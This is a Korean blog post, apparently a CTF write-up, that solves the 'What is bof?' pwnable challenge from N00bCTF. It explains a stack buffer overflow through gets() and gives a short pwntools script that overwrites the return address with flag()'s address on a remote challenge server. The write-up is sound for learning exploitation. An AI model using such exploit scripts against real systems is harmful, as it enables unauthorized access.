N00bCTF - What is bof?

Recent Posts

Archives

« 2025/01 »
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Tags more

관리 메뉴

글쓰기
방명록
RSS
관리

ii4gsp

N00bCTF - What is bof? 본문

시스템 해킹/N00bCTF - Pwnable

N00bCTF - What is bof?

ii4gsp 2020. 2. 10. 21:17

파일을 다운받아 주자.

파일을 IDA로 열어보면 gets()함수에서 취약점이 발생한다는것을 알 수 있다.

s는 0x14 즉, 10진수로 20만큼 할당되었고 sfp까지하면 24byte이다.

s ~ sfp 만큼 24byte를 덮어주고 ret를 flag() 함수의 주소로 조작하면 쉘을 획득할 수 있다.

flag()함수의 주소는 0x08048516 이다.

Exploit

from pwn import *

r = remote('52.79.224.215', 30005)

payload = ''
payload += '\x90' * 24
payload += p32(0x08048516)

r.recvuntil('>> ')
r.sendline(payload)

r.interactive()

'시스템 해킹 > N00bCTF - Pwnable' 카테고리의 다른 글

N00bCTF - Over the RET (0)	2020.02.10
N00bCTF - very ezzzzzz!! (0)	2020.02.10

'시스템 해킹/N00bCTF - Pwnable' Related Articles

N00bCTF - Over the RET 2020.02.10
N00bCTF - very ezzzzzz!! 2020.02.10

Comments

ii4gsp

N00bCTF - What is bof? 본문

N00bCTF - What is bof?

'시스템 해킹 > N00bCTF - Pwnable' 카테고리의 다른 글

티스토리툴바